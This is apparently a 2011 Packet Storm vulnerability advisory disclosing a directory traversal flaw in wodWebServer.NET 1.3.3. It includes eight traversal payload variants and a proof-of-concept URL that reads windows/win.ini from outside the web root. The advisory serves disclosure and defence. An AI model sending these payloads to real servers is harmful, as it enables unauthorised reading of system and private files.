wodWebServer.NET 1.3.3 Directory Traversal

2011-03-27T00:00:00
ID PACKETSTORM:99791
Type packetstorm
Reporter AutoSec Tools
Modified 2011-03-27T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................wodWebServer.NET 1.3.3  
Vulnerability...........Directory Traversal  
Threat Level............Serious (3/5)  
Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.asp  
Vendor Contact Date.....3/13/2011  
Disclosure Date.........3/27/2011  
Tested On...............Windows Vista  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be  
exploited to read files outside of the web root.  
  
  
--Exploit--  
  
..%5C/  
..%2F/  
..%2E/  
..\/  
..//  
.../  
..\  
../  
  
  
--PoC--  
  
http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini  
`